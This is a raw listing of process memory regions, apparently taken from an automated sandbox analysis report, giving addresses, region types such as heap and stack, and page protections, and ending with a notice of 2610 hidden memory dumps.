page read and write
286A5278000
heap
page read and write
21E8EEA6000
heap
page read and write
7FFDFB320000
unkown
page readonly
23A0FF50000
heap
page read and write
1F72ED3A000
heap
page read and write
2D8F5E6C000
heap
page read and write
27CC38A0000
heap
page read and write
181AD7D2000
heap
page read and write
181AD7FA000
heap
page read and write
16A0000
trusted library allocation
page read and write
21900060000
trusted library allocation
page read and write
20DBCBA2000
heap
page read and write
16A0000
trusted library allocation
page read and write
19CBC299000
heap
page read and write
2D8F5E49000
heap
page read and write
B3C2CFF000
unkown
page read and write
1DC71000000
heap
page read and write
16A0000
trusted library allocation
page read and write
1E002940000
heap
page read and write
12140000
trusted library allocation
page read and write
FD0000
heap
page read and write
20CA0710000
heap
page read and write
23D529D0000
heap
page read and write
2E4A9A56000
heap
page read and write
181B0D61000
direct allocation
page read and write
19DCAE90000
heap
page read and write
A354DAC000
stack
page read and write
196D8988000
heap
page read and write
7FFDFAFA1000
unkown
page execute and read and write
2D8F64A5000
heap
page read and write
7FF623F71000
unkown
page execute read
B532478000
stack
page read and write
7FFD9B080000
trusted library allocation
page read and write
7FF77203B000
unkown
page readonly
7FFD9AF40000
trusted library allocation
page read and write
23D52AD0000
heap
page read and write
21E8EEB8000
heap
page read and write
19CBC27F000
heap
page read and write
7FFDFB65F000
unkown
page execute and read and write
21E8F060000
heap
page read and write
7FF623FAE000
unkown
page write copy
201E0240000
heap
page read and write
2D8F64DA000
heap
page read and write
2D8F64C6000
heap
page read and write
7FFD9ACFD000
trusted library allocation
page execute and read and write
1B0E000
stack
page read and write
2E4A9A30000
heap
page read and write
2D8F5DE5000
heap
page read and write
2D8F5D8D000
heap
page read and write
19CBC2AA000
heap
page read and write
2D8F3C3E000
heap
page read and write
181AD7AA000
heap
page read and write
196D8910000
heap
page read and write
7FFE1023C000
unkown
page execute and read and write
8F448FF000
stack
page read and write
19CBBB57000
heap
page read and write
2F7F1BD000
stack
page read and write
7FFE01475000
unkown
page execute and write copy
2D8F649C000
heap
page read and write
2D8F6478000
heap
page read and write
2D8F5DE5000
heap
page read and write
45D11DF000
stack
page read and write
2A62F330000
heap
page read and write
2197E228000
heap
page read and write
16A0000
trusted library allocation
page read and write
2D8F64D8000
heap
page read and write
4C2D77E000
stack
page read and write
2D8F64C6000
heap
page read and write
121C0000
trusted library allocation
page read and write
2D8F64D6000
heap
page read and write
2D8F63F8000
heap
page read and write
16A0000
trusted library allocation
page read and write
21015048000
heap
page read and write
2D8F649A000
heap
page read and write
167E8130000
heap
page read and write
3650FE000
stack
page read and write
2D8F647A000
heap
page read and write
2D8F6280000
heap
page read and write
19CBC280000
heap
page read and write
7FFE10266000
unkown
page execute and write copy
1E01AB50000
heap
page read and write
2D8F6658000
heap
page read and write
1E000960000
heap
page read and write
102BCC000
stack
page read and write
2D8F64CD000
heap
page read and write
28A22061000
heap
page read and write
1E012B10000
trusted library allocation
page read and write
19CBBB75000
heap
page read and write
19CBBB66000
heap
page read and write
16A0000
trusted library allocation
page read and write
F0E9FDE000
stack
page read and write
1E01AC35000
heap
page read and write
2D8F6472000
heap
page read and write
181AD81D000
heap
page read and write
26531880000
heap
page read and write
2D8F3C43000
heap
page read and write
19CBBCF0000
heap
page read and write
2D8F5E19000
heap
page read and write
20DBCE44000
heap
page read and write
7FFE10301000
unkown
page execute and read and write
2D8F6487000
heap
page read and write
20CA0910000
heap
page read and write
2D8F5DE0000
heap
page read and write
2625EB07000
heap
page read and write
2D8F3C5A000
heap
page read and write
45D157F000
stack
page read and write
121C0000
trusted library allocation
page read and write
13DF6C40000
heap
page read and write
2D8F72EC000
direct allocation
page read and write
196D8991000
heap
page read and write
2CD1000
trusted library allocation
page read and write
19F10FE000
stack
page read and write
181AD960000
heap
page read and write
EDE000
heap
page read and write
7FFE0EB68000
unkown
page execute and read and write
7FFE12E11000
unkown
page execute and read and write
880000
heap
page read and write
7FFD9AEE2000
trusted library allocation
page read and write
16A0000
trusted library allocation
page read and write
2D8F6678000
heap
page read and write
2D8F666C000
heap
page read and write
7FFE148E1000
unkown
page execute and read and write
19DCB061000
heap
page read and write
2E4A9A55000
heap
page read and write
181B0C00000
direct allocation
page read and write
7FF623F9B000
unkown
page readonly
2A62F340000
heap
page read and write
7FFE13301000
unkown
page execute and read and write
1E000C7D000
heap
page read and write
19CBC28E000
heap
page read and write
16A0000
trusted library allocation
page read and write
181AD7A6000
heap
page read and write
2D8F3CA7000
heap
page read and write
1F72ED51000
heap
page read and write
2E4A9A68000
heap
page read and write
181AD780000
heap
page read and write
21901507000
trusted library allocation
page read and write
2D199CAB000
heap
page read and write
2E4A9A75000
heap
page read and write
201E0220000
heap
page read and write
CA0000
heap
page read and write
23A102D4000
heap
page read and write
2D8F6B17000
heap
page read and write
2A62F360000
heap
page read and write
1E9F000
stack
page read and write
2D8F63D8000
heap
page read and write
11AE000
stack
page read and write
181AD777000
heap
page read and write
256E8B29000
heap
page read and write
19CBDB4E000
heap
page read and write
7FFD9AF50000
trusted library allocation
page read and write
19CBBDB2000
heap
page read and write
2D8F3CA2000
heap
page read and write
1A49C290000
heap
page read and write
215A3260000
heap
page read and write
19CBBB6B000
heap
page read and write
2D8F3C5B000
heap
page read and write
19CBC28E000
heap
page read and write
2D8F6430000
heap
page read and write
2197E140000
heap
page read and write
20DBCB9E000
heap
page read and write
19CBBB8A000
heap
page read and write
2197E1C9000
heap
page read and write
2D8F6613000
heap
page read and write
196D8970000
heap
page read and write
2D8F64CA000
heap
page read and write
16A0000
trusted library allocation
page read and write
1E000BE0000
trusted library allocation
page read and write
2AF86470000
heap
page read and write
19CBBDB7000
heap
page read and write
D80000
heap
page read and write
2D8F609D000
heap
page read and write
2E4A9A7E000
heap
page read and write
16A0000
trusted library allocation
page read and write
2D8F661D000
heap
page read and write
2E4A9A7B000
heap
page read and write
1E004104000
trusted library allocation
page read and write
2A62F6B4000
heap
page read and write
E36F8FF000
stack
page read and write
E4D000
trusted library allocation
page execute and read and write
16A0000
trusted library allocation
page read and write
21901FE4000
trusted library allocation
page read and write
375E4FF000
stack
page read and write
7FFD9AF20000
trusted library allocation
page read and write
19CBC2A4000
heap
page read and write
7FFDFB2C0000
unkown
page execute and read and write
7FF623FAE000
unkown
page read and write
2D8F64E6000
heap
page read and write
21EE58BD000
heap
page read and write
7FFE01473000
unkown
page execute and read and write
2D8F5DB9000
heap
page read and write
215A32B8000
heap
page read and write
5170000
trusted library allocation
page read and write
23D52AB0000
heap
page read and write
19CBBB63000
heap
page read and write
217B5040000
heap
page read and write
27896190000
heap
page read and write
2D8F6420000
heap
page read and write
16A0000
trusted library allocation
page read and write
1B091D80000
heap
page read and write
12F9000
heap
page read and write
7FFE13346000
unkown
page read and write
AA5AB0D000
stack
page read and write
AAA73BC000
stack
page read and write
401000
unkown
page execute read
196D8991000
heap
page read and write
20DBCBBC000
heap
page read and write
21645ACB000
heap
page read and write
8677CFC000
stack
page read and write
215A32D1000
heap
page read and write
16A0000
trusted library allocation
page read and write
1F72ECB0000
heap
page read and write
1A601960000
heap
page read and write
219014E7000
trusted library allocation
page read and write
1C34C660000
unkown
page read and write
2D8F3C5E000
heap
page read and write
2D8F3CA6000
heap
page read and write
215A32CD000
heap
page read and write
4C2DB7B000
stack
page read and write
19DCB06D000
heap
page read and write
B5321FE000
stack
page read and write
5C00000
direct allocation
page read and write
7FFD9AEF0000
trusted library allocation
page read and write
1E01ABBF000
heap
page read and write
181AD781000
heap
page read and write
21645ADC000
heap
page read and write
181AD7E0000
heap
page read and write
1DC70DC0000
heap
page read and write
2D8F5D90000
heap
page read and write
7DF4C01F0000
trusted library allocation
page execute and read and write
181AD789000
heap
page read and write
12140000
trusted library allocation
page read and write
278CA940000
heap
page read and write
181B0D61000
direct allocation
page read and write
2D8F64FA000
heap
page read and write
181AD78E000
heap
page read and write
235B3030000
heap
page read and write
98F000
stack
page read and write
2D8F6430000
heap
page read and write
23DAA270000
heap
page read and write
7FFDFA224000
unkown
page execute and read and write
181AD7CA000
heap
page read and write
F7F8FF000
stack
page read and write
7FFDFA21C000
unkown
page execute and read and write
16A0000
trusted library allocation
page read and write
2D8F3C3E000
heap
page read and write
2D8F64D8000
heap
page read and write
2D8F6142000
heap
page read and write
5F659CF000
stack
page read and write
214474A0000
heap
page read and write
21900040000
trusted library allocation
page read and write
2D8F665B000
heap
page read and write
121C0000
trusted library allocation
page read and write
2D8F69C7000
heap
page read and write
23A0FF70000
heap
page read and write
9CFF39F000
stack
page read and write
181AD7B3000
heap
page read and write
2D8F6D15000
heap
page read and write
7FFD9B160000
trusted library allocation
page read and write
2D8F3C5A000
heap
page read and write
937A9FF000
unkown
page read and write
17A51500000
heap
page read and write
2625EE74000
heap
page read and write
121C0000
trusted library allocation
page read and write
AA5AF7F000
stack
page read and write
21645CF4000
heap
page read and write
2D8F6466000
heap
page read and write
7FF63426B000
unkown
page readonly
19DCB061000
heap
page read and write
219189DF000
heap
page read and write
2AF86535000
heap
page read and write
7FFE01300000
unkown
page readonly
2625ECE0000
heap
page read and write
2D8F6351000
heap
page read and write
23D52D00000
heap
page read and write
19CBC299000
heap
page read and write
7FFD9B100000
trusted library allocation
page read and write
196D8991000
heap
page read and write
19CBBB78000
heap
page read and write
219000F0000
trusted library allocation
page read and write
7FFD9ADAC000
trusted library allocation
page execute and read and write
17652FF000
stack
page read and write
19CBDB4E000
heap
page read and write
181AD9F0000
heap
page read and write
There are 2610 hidden memdumps, click here to show them.